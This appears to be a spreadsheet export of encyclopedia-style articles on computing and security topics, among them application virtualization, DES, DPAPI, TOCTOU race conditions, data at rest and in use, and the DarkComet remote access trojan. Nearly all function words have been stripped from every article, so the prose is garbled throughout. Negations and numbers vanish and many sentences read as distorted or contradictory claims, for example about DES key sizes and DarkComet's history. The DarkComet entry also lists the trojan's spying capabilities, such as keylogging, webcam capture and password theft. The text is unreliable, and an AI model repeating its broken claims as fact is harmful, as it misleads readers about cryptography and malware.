operating system. because vmware thinapp implemented user-mode without device drivers client preinstalled, applications directly flash network shares without previously needing elevated security privileges. softricity (acquired microsoft) operates similar principle using device drivers intercept file request ring0 level closer operating system. softricity installs client administrator mode accessed restricted users machine. advantage virtualizing kernel level windows loader (responsible loading files) need reimplemented greater application compatibility achieved less work (softricity claims support major applications). disadvantage ring0 implementation requires elevated security privileges installed crashes security defects occur system wide rather isolated specific application.because application virtualization runs application code natively, provide security guarantees strong host able provide. unlike full machine virtualization, application virtualization solutions currently work device drivers code runs ring0 virus scanners. these special applications must installed normally host function. managed runtimes another technique sometimes referred virtualization, portable byte code execution using standard portable native runtime (aka managed runtimes). popular solutions today include java .net. these solutions process called (just time) compilation translate code virtual portable machine language local processor's native code. this allows applications compiled single architecture many different machines. beyond machine portable applications, additional advantage technique includes strong security guarantees. because native application code generated controlling environment, checked correctness (possible security exploits) prior execution. programs must originally designed environment question manually rewritten recompiled work environments. example, cannot automatically convert windows linux native .net java. because portable runtimes present common applications wide variety hardware, applications less able take advantage specific features. portable application environments also higher memory overheads optimized native applications, overheads much smaller compared full machine virtualization. portable byte code environments java become popular server wide variety hardware exist os-specific apis required standard across unix windows flavors. another popular feature among managed runtimes garbage collection, automatically detects unused data memory reclaims memory without developer explicitly invoke "free" operations. neutral view application virtualization given industry-bias past, neutral, also ways look application level: first type application packagers (vmware thinapp, softricity) whereas application compilers (java .net). because packager, used stream applications without modifying source code, whereas latter used compile source code. another look hypervisor point view. first "hypervisor" user mode, whereas "hypervisor" runtime mode. hypervisor quotation, similar behavior intercept system calls different mode: user mode; runtime mode. user mode intercepts system calls runtime mode going kernel mode. real hypervisor needs intercept system call using hypercall kernel mode. hopefully, windows hypervisor, virtual machine monitor, even need clr. moreover, case linux, maybe modified hypervisor loadable kernel module running kernel mode, instead slow legacy runtime user mode. now, running linux hypervisor directly, called java another runtime mode jit. mendel rosenblum called runtime mode high-level language virtual machine august 2004. however, time, first type, intercepting system calls user mode, irresponsible unthinkable, mention article. hence, application streaming still mysterious 2004. now, jvm, longer high-level language virtual machines, becomes java running linux hypervisor, java applications level playing field, windows applications already softricity. summary, first virtualizing binary code installed anywhere, whereas virtualizing source code using byte code managed code written anywhere. both actually partial solutions twin portability problems application portability; source code portability. maybe time combine problems complete solution hypervisor level kernel mode. further development microsoft bought softricity july 2006, popularized application streaming, giving traditional windows applications level playing field java applications respect ease distribution (i.e. setup required, click run). soon every virtually user mode, without kernel mode drivers installed, even multiple versions running concurrently ram. integration linux hypervisor linux kernel windows hypervisor windows kernel make rootkit techniques filter driver obsolete. this take linux hypervisor still waiting hypervisor vmware hypervisor fully compatible oracle impatiently pounding door hypervisor come linux kernel full steam ahead grid computing life. meanwhile, microsoft decided fully compatible hypervisor [13]. ibm, course, idle working vmware servers, possibly helping move power using open source rhype. now, make hypervisor party full house, intel vt-x amd-v hoping ease speed paravirtualization guest unmodified. also comparison platform virtualization software comparison application virtual machines emulator hypervisor volume controller operating system-level virtualization physical-to-virtual virtual machine monitor virtual tape library virtualization references external links application virtualization: streamlining distribution august 2006—by james drews windows virtualization microsoft virtualization overview vmware introduction virtualization weblog post virtualization used implement mandatory access control. effect virtualization interference format. vm/360 history vm/360 history attacks virtual machine emulators</t>
  </si>
  <si>
    <t>DashO (software)</t>
  </si>
  <si>
    <t>dasho code obfuscator, compactor, optimizer, watermarker encryptor java, kotlin android applications. aims achieve little performance loss even code complexity increases.dasho also statically analyze code find unused types, methods, fields, delete them, thereby making application smaller. dasho delete used methods needed published applications, debugging logging calls. also dotfuscator code obfuscator .net. proguard (software) code obfuscator java. references</t>
  </si>
  <si>
    <t>Data Authentication Algorithm</t>
  </si>
  <si>
    <t>data authentication algorithm (daa) former u.s. government standard producing cryptographic message authentication codes. defined fips 113, withdrawn september 2008. algorithm considered secure today's standards. according standard, code produced called data authentication code (dac). algorithm chain encrypts data, last cipher block truncated used dac. equivalent iso/iec 9797-1 algorithm cbc-mac, underlying cipher, truncated bits (inclusive). sources</t>
  </si>
  <si>
    <t>Data Encryption Standard</t>
  </si>
  <si>
    <t>data encryption standard (des symmetric-key algorithm encryption digital data. although short length bits makes insecure modern applications, highly influential advancement cryptography. developed early 1970s based earlier design horst feistel, algorithm submitted national bureau standards (nbs) following agency's invitation propose candidate protection sensitive, unclassified electronic government data. 1976, consultation national security agency (nsa), selected slightly modified version (strengthened differential cryptanalysis, weakened brute-force attacks), published official federal information processing standard (fips) united states 1977.the publication nsa-approved encryption standard quick international adoption widespread academic scrutiny. controversies arose classified design elements, relatively short length symmetric-key block cipher design, involvement nsa, raising suspicions backdoor. s-boxes prompted suspicions designed remove backdoor secretly knew (differential cryptanalysis). however, also ensured size drastically reduced could break cipher brute force attack. intense academic scrutiny algorithm received time modern understanding block ciphers cryptanalysis. insecure relatively short 56-bit size. january 1999, distributed.net electronic frontier foundation collaborated publicly break hours minutes (see chronology). there also analytical results demonstrate theoretical weaknesses cipher, although infeasible practice. algorithm believed practically secure form triple des, although theoretical attacks. this cipher superseded advanced encryption standard (aes). withdrawn standard national institute standards technology.some documents distinguish standard algorithm, referring algorithm (data encryption algorithm). history origins date 1972, national bureau standards study government computer security identified need government-wide standard encrypting unclassified, sensitive information.around time, engineer mohamed atalla 1972 founded atalla corporation developed first hardware security module (hsm), so-called "atalla box" commercialized 1973. protected offline devices secure generating key, commercial success. banks credit card companies fearful atalla would dominate market, spurred development international encryption standard. atalla early competitor banking market, cited influence employees worked standard. 3624 later adopted similar verification system earlier atalla system.on 1973, consulting nsa, solicited proposals cipher would meet rigorous design criteria. none submissions suitable. second request issued august 1974. this time, submitted candidate deemed acceptable—a cipher developed period 1973–1974 based earlier algorithm, horst feistel's lucifer cipher. team involved cipher design analysis included feistel, walter tuchman, coppersmith, alan konheim, carl meyer, mike matyas, adler, edna grossman, bill notz, lynn smith, bryant tuckerman. nsa's involvement design march 1975, proposed published federal register. public comments requested, following year open workshops held discuss proposed standard. there criticism received public-key cryptography pioneers martin hellman whitfield diffie, citing shortened length mysterious "s-boxes" evidence improper interference nsa. suspicion algorithm covertly weakened intelligence agency they—but else—could easily read encrypted messages. alan konheim (one designers des) commented, sent s-boxes washington. they came back different." united states senate select committee intelligence reviewed nsa's actions determine whether improper involvement. unclassified summary findings, published 1978, committee wrote: development des, convinced reduced size sufficient; indirectly assisted development s-box structures; certified final algorithm was, best knowledge, free statistical mathematical weakness. however, also found tamper design algorithm way. invented designed algorithm, made pertinent decisions regarding concurred agreed upon size adequate commercial applications intended. another member team, walter tuchman, stated developed algorithm entirely within using ibmers. dictate single wire!" contrast, declassified book cryptologic history states: 1973 solicited private industry data encryption standard (des). first offerings disappointing, began working algorithm. then howard rosenblum, deputy director research engineering, discovered walter tuchman working modification lucifer general use. gave tuchman clearance brought work jointly agency lucifer modification." worked closely strengthen algorithm except brute-force attacks strengthen substitution tables, called s-boxes. conversely, tried convince reduce length bits. ultimately compromised 56-bit key. some suspicions hidden weaknesses s-boxes allayed 1990, independent discovery open publication biham shamir differential cryptanalysis, general method breaking block ciphers. s-boxes much resistant attack chosen random, strongly suggesting knew technique 1970s. this indeed case; 1994, coppersmith published original design criteria s-boxes. according steven levy, watson researchers discovered differential cryptanalytic attacks 1974 asked keep technique secret. coppersmith explains ibm's secrecy decision saying, "that [differential cryptanalysis] powerful tool, used many schemes, concern information public domain could adversely affect national security." levy quotes walter tuchman: "[t]hey asked stamp documents confidential... actually number locked safes, considered u.s. government classified. they said it". bruce schneier observed took academic community decades figure 'tweaks' actually improved security des." algorithm standard despite criticisms, approved federal standard november 1976, published january 1977 fips authorized unclassified data. subsequently reaffirmed standard 1983, 1988 (revised fips-46-1), 1993 (fips-46-2), 1999 (fips-46-3), latter prescribing "triple des" (see below). 2002, finally superseded advanced encryption standard (aes), following public competition. 2005, fips 46-3 officially withdrawn, nist approved triple year 2030 sensitive government information.the algorithm also specified ansi x3.92 (today known incits ansi x3.92 ansi incits 92), nist 800-67 iso/iec 18033-3 component tdea). another theoretical attack, linear cryptanalysis, published 1994, electronic frontier foundation's cracker 1998 demonstrated could attacked practically, highlighted need replacement algorithm. these methods cryptanalysis discussed detail later article. introduction considered catalyst academic study cryptography, particularly methods crack block ciphers. according nist retrospective des, said "jump-started" nonmilitary study development encryption algorithms. 1970s cryptographers, except military intelligence organizations, little academic study cryptography. there many active academic cryptologists, mathematics departments strong programs cryptography, commercial information security companies consultants. generation cryptanalysts teeth analyzing (that trying "crack") algorithm. words cryptographer bruce schneier, "des galvanize field cryptanalysis anything else. algorithm study." astonishing share open literature cryptography 1970s 1980s dealt des, standard every symmetric algorithm since compared. chronology description archetypal block cipher—an algorithm takes fixed-length string plaintext bits transforms series complicated operations another ciphertext bitstring length. case des, block size bits. also uses customize transformation, decryption supposedly performed know particular used encrypt. ostensibly consists bits; however, actually used algorithm. eight bits used solely checking parity, thereafter discarded. hence effective length bits. nominally stored transmitted bytes, parity. according ansi x3.92-1981 (now, known ansi incits 92-1981), section 3.5: 8-bit byte utilized error detection generation, distribution, storage. bits 16,..., ensuring byte parity. like block ciphers, secure means encryption, must instead used mode operation. fips-81 specifies several modes des. further comments usage contained fips-74.decryption uses structure encryption, keys used reverse order. (this advantage hardware software used directions.) overall structure algorithm's overall structure shown figure identical stages processing, termed rounds. there also initial final permutation, termed inverses "undoes" action vice versa). cryptographic significance, included order facilitate loading blocks mid-1970s 8-bit based hardware.before main rounds, block divided 32-bit halves processed alternately; criss-crossing known feistel scheme. feistel structure ensures decryption encryption similar processes—the difference subkeys applied reverse order decrypting. rest algorithm identical. this greatly simplifies implementation, particularly hardware, need separate encryption decryption algorithms. symbol denotes exclusive-or (xor) operation. f-function scrambles half block together key. output f-function combined half block, halves swapped next round. after final round, halves swapped; feature feistel structure makes encryption decryption similar processes. feistel function f-function, depicted figure operates half block bits) time consists four stages: expansion: 32-bit half-block expanded bits using expansion permutation, denoted diagram, duplicating half bits. output consists eight 6-bit bits) pieces, containing copy corresponding input bits, plus copy immediately adjacent input pieces either side. mixing: result combined subkey using operation. sixteen 48-bit subkeys—one round—are derived main using schedule (described below). substitution: mixing subkey, block divided eight 6-bit pieces processing s-boxes, substitution boxes. each eight s-boxes replaces input bits four output bits according non-linear transformation, provided form lookup table. s-boxes provide core security des—without them, cipher would linear, trivially breakable. permutation: finally, outputs s-boxes rearranged according fixed permutation, p-box. this designed that, permutation, bits output s-box round spread across four different s-boxes next round.the alternation substitution s-boxes, permutation bits p-box e-expansion provides so-called "confusion diffusion" respectively, concept identified claude shannon 1940s necessary condition secure practical cipher. schedule figure illustrates schedule encryption—the algorithm generates subkeys. initially, bits selected initial permuted choice (pc-1)—the remaining eight bits either discarded used parity check bits. bits divided 28-bit halves; half thereafter treated separately. successive rounds, halves rotated left bits (specified round), subkey bits selected permuted choice (pc-2)—24 bits left half, right. rotations (denoted "&lt;&lt;&lt;" diagram) mean different bits used subkey; used approximately subkeys. schedule decryption similar—the subkeys reverse order compared encryption. apart change, process encryption. bits passed rotation boxes. security cryptanalysis although information published cryptanalysis block cipher, practical attack date still brute-force approach. various minor cryptanalytic properties known, three theoretical attacks possible which, theoretical complexity less brute-force attack, require unrealistic number known chosen plaintexts carry out, concern practice. brute-force attack cipher, basic method attack brute force—trying every possible turn. length determines number possible keys, hence feasibility approach. des, questions raised adequacy size early even adopted standard, small size, rather theoretical cryptanalysis, dictated need replacement algorithm. result discussions involving external consultants including nsa, size reduced bits bits single chip. academia, various proposals des-cracking machine advanced. 1977, diffie hellman proposed machine costing estimated us$20 million could find single day. 1993, wiener proposed key-search machine costing us$1 million would find within hours. however, none early proposals ever implemented—or, least, implementations publicly acknowledged. vulnerability practically demonstrated late 1990s. 1997, security sponsored series contests, offering $10,000 prize first team broke message encrypted contest. that contest deschall project, rocke verser, matt curtin, justin dolske, using idle cycles thousands computers across internet. feasibility cracking quickly demonstrated 1998 custom des-cracker built electronic frontier foundation (eff), cyberspace civil rights group, cost approximately us$250,000 (see cracker). their motivation show breakable practice well theory: "there many people believe truth eyes. showing physical machine crack days convince people really cannot trust security des." machine brute-forced little days' worth searching. next confirmed cracker copacobana machine built 2006 teams universities bochum kiel, germany. unlike machine, copacobana consists commercially available, reconfigurable integrated circuits. field-programmable gate arrays (fpgas) type xilinx spartan-3 1000 parallel. they grouped dimm modules, containing fpgas. reconfigurable hardware makes machine applicable code breaking tasks well. interesting aspects copacobana cost factor. machine built approximately $10,000. cost decrease roughly factor machine example continuous improvement digital hardware—see moore's law. adjusting inflation years yields even higher improvement 30x. since 2007, sciengines gmbh, spin-off company project partners copacobana enhanced developed successors copacobana. 2008 copacobana rivyera reduced time break less day, using spartan-3 5000's. sciengines rivyera held record brute-force breaking des, utilized spartan-3 5000 fpgas. their spartan-6 lx150 model lowered time. 2012, david hulton moxie marlinspike announced system xilinx virtex-6 lx240t fpgas, fpga containing fully pipelined cores running mhz, total capacity gigakeys/sec. system exhaustively search entire 56-bit space hours service offered online. attacks faster brute force there three attacks known break full rounds less complexity brute-force search: differential cryptanalysis (dc), linear cryptanalysis (lc), davies' attack. however, attacks theoretical generally considered infeasible mount practice; types attack sometimes termed certificational weaknesses. differential cryptanalysis rediscovered late 1980s biham shamir; known earlier kept secret. break full rounds, differential cryptanalysis requires chosen plaintexts. designed resistant linear cryptanalysis discovered mitsuru matsui, needs known plaintexts (matsui, 1993); method implemented (matsui, 1994), first experimental cryptanalysis reported. there evidence tailored resistant type attack. generalization lc—multiple linear cryptanalysis—was suggested 1994 (kaliski robshaw), refined biryukov others. (2004); analysis suggests multiple linear approximations could used reduce data requirements attack least factor (that instead 243). similar reduction data complexity obtained chosen-plaintext variant linear cryptanalysis (knudsen mathiassen, 2000). junod (2001) performed several experiments determine actual time complexity linear cryptanalysis, reported somewhat faster predicted, requiring time equivalent 239–241 evaluations. improved davies' attack: linear differential cryptanalysis general techniques applied number schemes, davies' attack specialized technique des, first suggested donald davies eighties, improved biham biryukov (1997). powerful form attack requires known plaintexts, computational complexity 250, success rate.there also attacks proposed reduced-round versions cipher, versions fewer rounds. such analysis gives insight many rounds needed safety, much "security margin" full version retains. differential-linear cryptanalysis proposed langford hellman 1994, combines differential linear cryptanalysis single attack. enhanced version attack break 9-round 215.8 chosen plaintexts 229.2 time complexity (biham others, 2002). minor cryptanalytic properties exhibits complementation property, namely {\displaystyle e_{k}(p)=c\iff e_{\overline {k}}({\overline {p}})={\overline {c}}} {\displaystyle {\overline {x}}} bitwise complement {\displaystyle {\displaystyle e_{k}} denotes encryption {\displaystyle {\displaystyle {\displaystyle denote plaintext ciphertext blocks respectively. complementation property means work brute-force attack could reduced factor single bit) chosen-plaintext assumption. definition, property also applies tdes cipher.des also four so-called weak keys. encryption decryption weak effect (see involution): {\displaystyle e_{k}(e_{k}(p))=p} equivalently, {\displaystyle e_{k}=d_{k}.} there also pairs semi-weak keys. encryption pair semiweak keys, {\displaystyle k_{1}} operates identically decryption other, {\displaystyle k_{2}} {\displaystyle e_{k_{1}}(e_{k_{2}}(p))=p} equivalently, {\displaystyle e_{k_{2}}=d_{k_{1}}.} easy enough avoid weak semiweak keys implementation, either testing explicitly, simply choosing keys randomly; odds picking weak semiweak chance negligible. keys really weaker keys anyway, give attack advantage. also proved group, precisely, {\displaystyle \{e_{k}\}} (for possible keys {\displaystyle functional composition group, "close" group. this open question time, case, would possible break des, multiple encryption modes triple would increase security, repeated encryption (and decryptions) different keys would equivalent encryption another, single key. simplified simplified (sdes) designed educational purposes only, help students learn modern cryptanalytic techniques. sdes similar structure properties des, simplified make much easier perform encryption decryption hand pencil paper. some people feel learning sdes gives insight block ciphers, insight various cryptanalytic attacks them. replacement algorithms concerns security relatively slow operation software motivated researchers propose variety alternative block cipher designs, started appear late 1980s early 1990s: examples include rc5, blowfish, idea, newdes, safer, cast5 feal. most designs kept 64-bit block size des, could "drop-in" replacement, although typically used 64-bit 128-bit key. soviet union gost 28147-89 algorithm introduced, 64-bit block size 256-bit key, also used russia later. adapted reused secure scheme. many former users triple (tdes) described analysed des's patentees (see fips 46-3); involves applying three times (2tdes) three (3tdes) different keys. tdes regarded adequately secure, although quite slow. less computationally expensive alternative des-x, increases size xoring extra material des. gdes variant proposed speed encryption, shown susceptible differential cryptanalysis. january 1997, nist announced wished choose successor des. 2001, international competition, nist selected cipher, advanced encryption standard (aes), replacement. algorithm selected submitted designers name rijndael. other finalists nist competition included rc6, serpent, mars, twofish. also brute force: cracking data encryption standard supplementary material skipjack (cipher) triple notes references external links fips 46-3: official document describing standard (pdf) copacobana, $10,000 cracker based fpgas universities bochum kiel step-by-step presentation reliable message encoding application fast implementation software biham multiple linear approximations rfc4772 security implications using data encryption standard (des)</t>
  </si>
  <si>
    <t>Data Integrity Field</t>
  </si>
  <si>
    <t>data integrity field (dif) approach protect data integrity computer data storage data corruption. proposed 2003 subcommittee international committee information technology standards. similar approach data integrity added 2016 nvme 1.2.1 specification.packet-based storage transport protocols protection command data payloads. interconnect buses parity protection. memory systems parity detection/correction schemes. protocol controllers transport/interconnect boundaries internal data path protection. data availability storage systems frequently measured simply terms reliability hardware components effects redundant hardware. reliability software, ability detect errors, ability correctly report apply corrective actions failure significant bearing overall storage system availability. data exchange usually takes place host storage disk. there storage data controller two. controller could raid controller simple storage switches. included extending disk sector traditional bytes, bytes, adding eight additional protection bytes. this extended sector defined small computer system interface (scsi) devices, turn used many enterprise storage technologies, fibre channel.oracle corporation included support linux kernel. evolution technology called protection information introduced 2012. large vendor promoting technology corporation. references external links linux data integrity, august 2008, oracle corporation, martin petersen (archived original january 2015) linux storage topology advanced features, november 2009, martin petersen data integrity field t10.org, working 2019.</t>
  </si>
  <si>
    <t>Data Protection API</t>
  </si>
  <si>
    <t>dpapi (data protection application programming interface) simple cryptographic application programming interface available built-in component windows 2000 later versions microsoft windows operating systems. theory data protection enable symmetric encryption kind data; practice, primary windows operating system perform symmetric encryption asymmetric private keys, using user system secret significant contribution entropy. detailed analysis dpapi inner-workings published 2011 bursztein al.for nearly cryptosystems, difficult challenges "key management" part, securely store decryption key. stored plain text, user access access encrypted data. encrypted, another needed, dpapi allows developers encrypt keys using symmetric derived user's logon secrets, case system encryption, using system's domain authentication secrets. dpapi keys used encrypting user's keys stored %appdata%\microsoft\protect\{sid} directory, {sid} security identifier user. dpapi stored file master protects users private keys. usually bytes random data. security properties dpapi store persistent data itself; instead, simply receives plaintext returns ciphertext vice versa). dpapi security relies upon windows operating system's ability protect master private keys compromise, attack scenarios highly reliant security user's credentials. main encryption/decryption derived user's password pbkdf2 function. particular data binary large objects encrypted salt added and/or external user-prompted password (aka "strong protection") required. salt per-implementation option i.e. control application developer controllable user system administrator. delegated access given keys com+ object. this enables servers dpapi. dpapi microsoft software while universally implemented microsoft products, dpapi microsoft products increased successive version windows. however, many applications microsoft third-party developers still prefer protection approach recently switched dpapi. example, internet explorer versions 4.0-6.0, outlook express explorer used older protected storage (pstore) store saved credentials passwords etc. internet explorer protects stored user credentials using dpapi. picture password, fingerprint windows encrypting file system windows 2000 later server transparent data encryption (tde) service master encryption internet explorer standalone version available windows integrated versions available windows vista windows server 2008 microsoft edge windows mail windows live mail outlook s/mime internet information services ssl/tls windows rights management services client v1.1 later windows 2000 later eap/tls (vpn authentication) 802.1x (wifi authentication) windows later stored user names passwords (aka credential manager) .net framework later system.security.cryptography.protecteddata microsoft.owin (katana) authentication default self hosting (including cookie authentication oauth tokens) references external links windows data protection (dpapi) white paper labs data encryption dpapi dpapi (user store) asp.net enterprise services system.security.cryptography.protecteddata .net framework later discussion backupkey remote protocol dpapi protect user secrets windows pstore</t>
  </si>
  <si>
    <t>Time-of-check to time-of-use</t>
  </si>
  <si>
    <t>software development, time-of-check time-of-use (toctou, tocttou toc/tou) class software bugs caused race condition involving checking state part system (such security credential) results check. toctou race conditions common unix operations file system, occur contexts, including local sockets improper database transactions. early 1990s, mail utility unix exploitable race condition temporary files used mktemp() function. early versions openssh exploitable race condition unix domain sockets. they remain problem modern systems; 2019, toctou race condition docker allows root access filesystem host platform. examples unix, following code, used setuid program, toctou bug: here, access intended check whether real user executed setuid program would normally allowed write file (i.e., access checks real userid rather effective userid). this race condition vulnerable attack: example, attacker exploit race condition access open trick setuid victim overwriting entry system password database. toctou races used privilege escalation, administrative access machine. although sequence events requires precise timing, possible attacker arrange conditions without much difficulty. implication applications cannot assume state managed operating system case file system namespace) change system calls. reliably timing toctou exploiting toctou race condition requires precise timing ensure attacker's operations interleave properly victim's. example above, attacker must execute symlink system call precisely access open. general attack, attacker must scheduled execution operation victim, also known "single-stepping" victim. case mail utility mktemp(), attacker simply keep launching mail utility process, keep guessing temporary file names keep making symlinks another process. attack usually succeed less minute. techniques single-stepping victim program include file system mazes algorithmic complexity attacks. cases, attacker manipulates state control scheduling victim. file system mazes force victim read directory entry cache, puts victim sleep reading directory disk. algorithmic complexity attacks force victim spend entire scheduling quantum inside single system call traversing kernel's hash table cached file names. attacker creates large number files names hash value file victim look preventing toctou despite conceptual simplicity, toctou race conditions difficult avoid eliminate. general technique error handling instead pre-checking, philosophy eafp easier forgiveness permission" rather lbyl "look leap" case check, failure assumptions hold signaled error returned.in context file system toctou race conditions, fundamental challenge ensuring file system cannot changed system calls. 2004, impossibility result published, showing portable, deterministic technique avoiding toctou race conditions.since impossibility result, libraries tracking file descriptors ensuring correctness proposed researchers.an alternative solution proposed research community unix systems adopt transactions file system kernel. transactions provide concurrency control abstraction used prevent toctou races. while production unix kernel adopted transactions, proof-of-concept research prototypes developed linux, including valor file system txos kernel. microsoft windows added transactions ntfs file system, microsoft discourages use, indicated removed future version windows.file locking common technique preventing race conditions single file, extend file system namespace metadata, locking work well networked filesystems, cannot prevent toctou race conditions. setuid binaries possible solution seteuid() system call change effective user perform open(). differences setuid() operating systems problematic. also linearizability references further reading bishop, matt; dilger, michael (1996). "checking race conditions file accesses" (pdf). computing systems. 131–152.tsafrir, dan; hertz, tomer; wagner, david; silva, dilma (2008). "portably solving file tocttou races hardness amplification" (pdf). proceedings usenix conference file storage technologies (fast '08), jose (ca), february 26–29, 2008. 189–206.</t>
  </si>
  <si>
    <t>Data at rest</t>
  </si>
  <si>
    <t>data rest information technology means data housed physically computer data storage digital form (e.g. cloud storage, file hosting services, databases, data warehouses, spreadsheets, archives, tapes, off-site cloud backups, mobile devices etc.). data rest includes structured unstructured data. this type data subject threats hackers malicious threats gain access data digitally physical theft data storage media. prevent data accessed, modified stolen, organizations often employ security protection measures password protection, data encryption, combination both. security options used type data broadly referred data rest protection (darp). data rest used complement terms data data transit together define three states digital data (see figure alternative definition there disagreement regarding difference data rest data use. data rest generally refers data stored persistent storage (disk, tape) data generally refers data processed computer central processing unit (cpu) random access memory (ram, also referred main memory simply memory). definitions include: "...all data computer storage excluding data traversing network temporarily residing computer memory read updated." "...all data storage excludes data frequently traverses network resides temporary memory. data rest includes limited archived data, data accessed changed frequently, files stored hard drives, thumb drives, files stored backup tape disks, also files stored off-site storage area network (san)." data also taken mean “active data” context database manipulated application. example, enterprise encryption gateway solutions cloud claim encrypt data rest, data transit data use.while generally accepted archive data (i.e. never changes), regardless storage medium, data rest active data subject constant frequent change data use. “inactive data” could taken mean data change, infrequently. imprecise nature terms “constant” “frequent” means stored data cannot comprehensively defined either data rest use. these definitions could taken assume data rest superset data use; however, data use, subject frequent change, distinct processing requirements data rest, whether completely static subject occasional change. division data rest sub-categories "static" "inconstant" addresses distinction (see figure 2).. concerns data rest because nature data rest increasing concern businesses, government agencies institutions. mobile devices often subject specific security protocols protect data rest unauthorized access lost stolen increasing recognition database management systems file servers also considered risk; longer data left unused storage, likely might retrieved unauthorized individuals outside network. encryption data encryption, prevents data visibility event unauthorized access theft, commonly used protect data motion increasingly promoted protecting data rest.the encryption data rest include strong encryption methods rsa. encrypted data remain encrypted access controls usernames password fail. increasing encryption multiple levels recommended. cryptography implemented database housing data physical storage databases stored. data encryption keys updated regular basis. encryption keys stored separately data. encryption also enables crypto-shredding data hardware lifecycle. periodic auditing sensitive data part policy occur scheduled occurrences. finally, store minimum possible amount sensitive data. tokenization tokenization non-mathematical approach protecting data rest replaces sensitive data non-sensitive substitutes, referred tokens, extrinsic exploitable meaning value. this process alter type length data, means processed legacy systems databases sensitive data length type. tokens require significantly less computational resources process less storage space databases traditionally encrypted data. this achieved keeping specific data fully partially visible processing analytics sensitive information kept hidden. lower processing storage requirements makes tokenization ideal method securing data rest systems manage large volumes data. federation method preventing unwanted access data rest data federation especially data distributed globally (e.g. off-shore archives). example would european organisation stores archived data off-site under terms patriot american authorities demand access data physically stored within boundaries, even includes personal information european citizens connections data encryption alone cannot used prevent authorities right demand decrypted information. data federation policy retains personal citizen information foreign connections within country origin (separate information either personal relevant off-shore authorities) option address concern. however, data stored foreign countries accessed using legislation cloud act. references</t>
  </si>
  <si>
    <t>Time-delay combination locks</t>
  </si>
  <si>
    <t>time-delay combination lock commonly digital, electronic combination lock equipped delay timer delays unlocking lock user-definable delay period, usually less hour. unlike time lock, unlocks preset time case bank vault), time-delay locks operate time safe unlocked, operator must wait delay period elapse lock opened. time delay safes commonly used businesses high cash transactions. they used banks including nationwide, hsbc, barclays, halifax. time-delay combination locks frequently incorporated money safes armed robbery deterrent. many instances, time-delay combination locks also equipped duress code entered activate time delay whilst sending silent alarm monitoring centre.modern time delay combination locks many functions multiple different codes, pre-set time lock settings (open close times), pre-set vacation times (e.g. christmas day), dual code facility, full audit trail providing detailed record lock history showing opened lock, long open.they also non-volatile memory information lost batteries depleted. this allow safe opened batteries changed pre-set time correct code entered. some electronic combination locks time-delay feature require code entered twice: start timer, second unlock open safe entered delay period expired. references</t>
  </si>
  <si>
    <t>Data in use</t>
  </si>
  <si>
    <t>data information technology term referring active data stored non-persistent digital state typically computer random-access memory (ram), caches, registers. scranton, data scientist daniel allen 1996 proposed data complement terms data transit data rest together define three states digital data. alternative definitions data refers data computer memory. some cloud software service (saas) providers refer data data currently processed applications, memory utilized. concerns because nature, data increasing concern businesses, government agencies institutions. data use, memory, contain sensitive data including digital certificates, encryption keys, intellectual property (software algorithms, design data), personally identifiable information. compromising data enables access encrypted data rest data motion. example, someone access random access memory parse memory locate encryption data rest. once obtained encryption key, decrypt encrypted data rest. threats data come form cold boot attacks, malicious hardware devices, rootkits bootkits. full memory encryption encryption, prevents data visibility event unauthorized access theft, commonly used protect data motion data rest increasingly recognized optimal method protecting data use. there multiple projects encrypt memory. microsoft xbox systems designed provide memory encryption company privatecore presently commercial software product vcage provide attestation along full memory encryption servers. several papers published highlighting availability security-enhanced commodity processors. work, cortex-a8 processor used substrate full memory encryption solution built. process segments (for example, stack, code heap) encrypted individually composition. this work marks first full memory encryption implementation mobile general-purpose commodity processor. system provides confidentiality integrity protections code data encrypted everywhere outside boundary. systems, secure memory encryption (sme) feature introduced 2017 epyc. intel promised deliver total memory encryption (tme) feature upcoming cpu. cpu-based storage operating system kernel patches tresor loop-amnesia modify operating system registers used store encryption keys avoid holding encryption keys ram. while approach general purpose protect data use, protect cold boot attacks. encryption keys held inside rather data rest encryption keys protected attacks might compromise encryption keys memory. enclaves enclaves enable “enclave” secured encryption enclave data encrypted available clear text inside cache. intel corporation introduced concept “enclaves” part software guard extensions. intel revealed architecture combining software hardware technical papers published 2013. cryptographic protocols several cryptographic tools, including secure multi-party computation homomorphic encryption, allow private computation data untrusted systems. data could operated upon encrypted never exposed system processing. also also alternative definition section data rest homomorphic encryption form encryption allows computation ciphertexts. zero-knowledge proof method party (the prover) prove another party (the verifier) know value without conveying information apart fact know value secure multi-party computation method parties jointly compute function inputs keeping inputs private. non-interactive zero-knowledge proof (nizks) zero-knowledge proofs require interaction prover verifier. format-preserving encryption (fpe), refers encrypting output (the ciphertext) format input (the plaintext) blinding cryptography technique agent provide service client encoded form without knowing either real input real output. example privacy-enhancing technologies references</t>
  </si>
  <si>
    <t>DarkComet</t>
  </si>
  <si>
    <t>darkcomet remote access trojan (rat) developed jean-pierre lesueur (known darkcodersc), independent programmer computer security coder france. although developed back 2008, began proliferate start 2012. program discontinued, partially syrian civil monitor activists also author's fear arrested unnamed reasons. august 2018, program's development "has ceased indefinitely", downloads longer offered official website.darkcomet allows user control system graphical user interface. many features allows user administrative remote help tool; however, darkcomet many features used maliciously. darkcomet commonly used victims taking screen captures, key-logging, password stealing. history darkcomet syria 2014 darkcomet linked syrian conflict. people syria began using secure connections bypass government's censorship surveillance internet. this caused syrian government resort using rats civilians. many believe caused arrests many activists within syria.the distributed "booby-trapped skype chat message" consisted message facebook icon actually executable file designed install darkcomet. once infected, victim's machine would send message people booby-trapped skype chat message. once darkcomet linked syrian regime, lesueur stopped developing tool, stating, never imagined would used government spying,” said. known that, would never created tool.” target gamers, military governments 2012 arbos network company found evidence darkcomet used target military gamers unknown hackers africa. time, mainly targeted united states. suis charlie wake january 2015, attack charlie hebdo magazine paris, hackers used "#jesuischarlie" slogan trick people downloading darkcomet. darkcomet disguised picture newborn baby whose wristband read suis charlie." once picture downloaded, users became compromised. hackers took advantage disaster compromise many systems possible. darkcomet spotted within hours attack. architecture features architecture darkcomet, like many rats, uses reverse-socket architecture. uninfected computer enabling control infected ones client, infected systems (without gui) servers.when darkcomet executes, server connects client allows client control monitor server. point client features contains. socket opened server waits receive packets controller, executes commands received. features following list features exhaustive critical ones make darkcomet dangerous tool. many features used completely take system allows client full access granted uac. functions webcam capture sound capture remote desktop keylogger network functions active ports network shares server socks5 computers gateway scanner download browse page redirect ip/port wifi access points computer power poweroff shutdown restart logoff server actions lock computer restart server close server uninstall server upload execute remote edit service update server from from filedarkcomet also "fun features". features manager piano message microsoft reader remote chat detection darkcomet widely known piece malware. user installs antivirus, darkcomet remover, un-infect computer quickly. target machines typically anything windows windows common anti-virus tags dark comet application follow: 